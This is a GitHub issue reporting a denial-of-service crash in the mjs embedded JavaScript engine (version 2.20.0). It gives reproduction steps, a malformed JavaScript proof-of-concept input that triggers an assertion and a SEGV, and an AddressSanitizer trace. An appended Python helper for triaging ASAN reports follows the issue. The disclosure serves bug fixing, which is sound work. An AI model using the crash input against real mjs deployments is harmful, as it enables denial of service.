cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com

SEGV in mjs_getretvalpos #251

Open vorfreuder opened 9 months ago

vorfreuder commented 9 months ago

The name of an affected Product: mjs

The affected version: Commit b1b6eac (Tag: 2.20.0)

Description: An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.

Vulnerability Type: segmentation violation

Environment

Steps to Reproduce

````
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
````

poc

````
let i, a = 0, b0= 0, c = 0continu, d0, e = 0; for (i = 8; i < 20; i++) { a let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify+= i; c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}'; let o = JSON.parse(s); let z = JSON.parse('""'); // Zlength string let s2 = JSON.stringify(o)AAA
````

run command

````
mjs -f poc
````

ASAN info

````
AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
````
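The trace above shows an assertion inside mjs_getretvalpos surfacing as a SEGV in glibc's vasprintf, so triage that keys on the top frame would file this report under glibc rather than mjs. As an added triage helper (not part of mjs or of this report), the following Python parses the ASAN output, skips the assert-reporting frames, and attributes the crash to the first in-project frame; the `/mjs/` path marker and the trimmed sample report are assumptions taken from the output above.

```python
import re

# Constructed sample: the ASAN report from this issue, trimmed to the
# lines the parser needs (error line, access line, frames, summary).
SAMPLE_REPORT = """\
AddressSanitizer:DEADLYSIGNAL
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
"""

FRAME_RE = re.compile(r"^\s*#(\d+)\s+0x[0-9a-f]+\s+in\s+(\S+)\s+(\S+)")
ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (\S+)")
ACCESS_RE = re.compile(r"caused by a (READ|WRITE) memory access")

# Frames that belong to the C runtime's error-reporting path, not to the bug.
RUNTIME_FRAMES = {"vasprintf", "asprintf", "__assert_fail_base", "__assert_fail", "abort", "raise"}

def parse_frames(report: str) -> list[tuple[int, str, str]]:
    """Return (index, function, location) for every stack frame in the report."""
    return [(int(m.group(1)), m.group(2), m.group(3))
            for m in map(FRAME_RE.match, report.splitlines()) if m]

def triage(report: str, project_marker: str = "/mjs/") -> dict:
    """Classify an ASAN report: error kind, access type, whether it came through
    an assert, and the first project frame (where a fix should start)."""
    frames = parse_frames(report)
    kind = ERROR_RE.search(report)
    access = ACCESS_RE.search(report)
    via_assert = any(fn == "__assert_fail" for _, fn, _ in frames)
    project = [(fn, loc) for _, fn, loc in frames
               if project_marker in loc and fn not in RUNTIME_FRAMES]
    return {
        "kind": kind.group(1) if kind else "unknown",
        "access": access.group(1) if access else None,
        "via_assert": via_assert,
        "culprit": project[0][0] if project else None,
        # bucket key: dedupe fuzzer crashes by the top three project frames
        "bucket": "|".join(fn for fn, _ in project[:3]),
    }
```

For this report the bucket is `mjs_getretvalpos|mjs_arg|mjs_op_json_stringify`, which groups it with other PoCs that hit the same assert regardless of where glibc's assert machinery happens to fault.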